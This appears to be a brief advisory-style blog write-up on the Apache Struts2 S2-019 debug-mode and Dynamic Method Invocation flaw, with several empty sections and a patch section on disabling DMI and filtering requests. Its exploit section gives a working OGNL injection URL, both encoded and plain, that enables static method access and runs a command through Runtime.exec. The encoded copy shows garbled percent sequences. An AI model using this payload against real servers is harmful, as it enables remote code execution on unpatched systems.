catalog
. Description
. Effected Scope
. Exploit Analysis
. Principle Of Vulnerability
. Patch Fix
1. Description
Dynamic Method Invocation is a mechanism known to impose possible security vulnerabilities, but until now it was enabled by default with warning that users should switch it off if possible.
Relevant Link:
http://struts.apache.org/docs/s2-019.html?spm=5176.775974950.2.8.iJuruO
2. Effected Scope
3. Exploit Analysis
0x1: POC
需要目标struts2应用开启debug模式
http://localhost:8080/crazyit/register.action?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField
%%27allowStaticMethodAccess%%,%23f.setAccessible%28true%,%23f.set%%23_memberAccess,true%,
@java.lang.Runtime@getRuntime%%.exec%%/Applications/Calculator.app/Contents/MacOS/Calculator%%
/*
http://localhost:8080/crazyit/register.action?debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField
('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),
@java.lang.Runtime@getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')
*/
Relevant Link:
http://qqhack8.blog.163.com/blog/static/114147985201463194423958/
http://qqhack8.blog.163.com/blog/static/114147985201402743220859
4. Principle Of Vulnerability
5. Patch Fix
0x1: upgrade struts2
In Struts 2.3.15.2 the Dynamic Method Invocation is to false by default. Another option is to set struts.enable.DynamicMethodInvocation to false in struts.xml
<constant name="struts.enable.DynamicMethodInvocation" value="false"/>
0x2: 手动修复方法
. 使用过滤器对相关关键字进行拦截,需要修改struts.xml,并重启struts2应用进程
. 动态关闭struts2的属性开关(hotfix)
. 使用waf进行URL层面的拦截
Relevant Link:
http://www.fjssc.cn/html/research/notice/2014/0127/78.html
Copyright (c) 2015 Little5ann All rights reserved